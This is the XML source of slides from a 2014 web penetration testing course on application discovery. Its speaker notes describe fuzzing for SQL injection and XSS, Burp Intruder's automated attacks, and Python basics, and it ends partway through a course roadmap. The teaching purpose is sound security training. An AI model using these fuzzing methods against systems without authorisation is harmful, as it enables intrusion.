          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302083"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing is a term referring to automated testing.  This testing is a brute force type of attack that will place input into specified parameters of an application and see what happens.  The tools used can be built to place random strings into these parameters or specific strings to test for things like SQL injection or XSS flaws.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fuzzers are used to browse a web page, and modify or inject malicious data in any way possible automatically. This can include web form fields, cookies, URI elements, form submission types, etc.  Check the results for indicators of success, but be aware that these indicators are not always accurate and can lead to false-positives and occasionally false-negatives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240643" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The Burp Intruder is the automated attack tool within the suite.  The Intruder is limited with in the free version of Burp, but still contains numerous attacks within it.  When we send requests to the intruder, it attempts to automatically determine which parameters should be targeted.  We are able to use the buttons on the right hand side of the screen to move this selection.</a:t>
            </a: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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304131"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing is not hacking, or at least not in totality.  Fuzzing is an approach to finding vulnerabilities in an automated fashion.  The results of fuzzing should be considered raw data for analysis.  Even the most mature automated tools return data which will need to be verified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Record the data found, review it, and keep it in mind as we head towards exploitation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>99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3DB655-50C4-45E6-A578-CAA3EE3C9AF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728778"/>
            <a:ext cx="9144000" cy="5144786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1905000"/>
            <a:ext cx="7772400" cy="1447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361476" name="Rectangle 4"/>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dirty="0"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="-61608" y="6406961"/>
            <a:ext cx="685800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{20B8B63F-B559-4CC7-A844-A7B51D6F17D1}" type="slidenum">
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFCC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCC00"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1463595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9075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1578684"/>
            <a:ext cx="8686800" cy="4724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364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3235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772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>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822802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4D9F24-0869-4634-B169-903289646E10}"/>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3891" y="1720996"/>
            <a:ext cx="9144000" cy="5144786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="219075" y="152401"/>
            <a:ext cx="8734425" cy="114299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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1524000"/>
            <a:ext cx="86868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Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="113489" y="6400799"/>
            <a:ext cx="685800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{20B8B63F-B559-4CC7-A844-A7B51D6F17D1}" type="slidenum">
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFCC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCC00"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4073535373"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483938" r:id="rId1"/>
    <p:sldLayoutId id="2147483939" r:id="rId2"/>
    <p:sldLayoutId id="2147483940" r:id="rId3"/>
    <p:sldLayoutId id="2147483941" r:id="rId4"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:title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1800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="18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5.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/></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a:xfrm>
            <a:off x="685800" y="1981200"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web Penetration Testing and Ethical Hacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application Discovery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9220" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5394325"/>
            <a:ext cx="9144000" cy="584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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Copyright 2014, Secure Ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Version 1Q14</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFE501FB-99B7-4378-A53E-210151BC76B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3623494"/>
            <a:ext cx="9144000" cy="16435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3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Professionally Evil </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web Application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Penetration Testing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>101.3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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7170" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="1269366"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python can be used to write</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>both web applications and client </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Simple scripting syntax that is compiled at run-time into byte-code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Released in 1991 by Guido van Rossum and as since sky-rocketed in popularity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Comes pre-installed on Mac and Linux, easy to install on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python released the 3.x series a few years ago, however it breaks compatibility with 2.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will cover 2.x in class as most tools are still using it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7171" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print">
            <a:lum bright="-12000" contrast="10000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6126163" y="198438"/>
            <a:ext cx="2828925" cy="213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109184760"/>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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
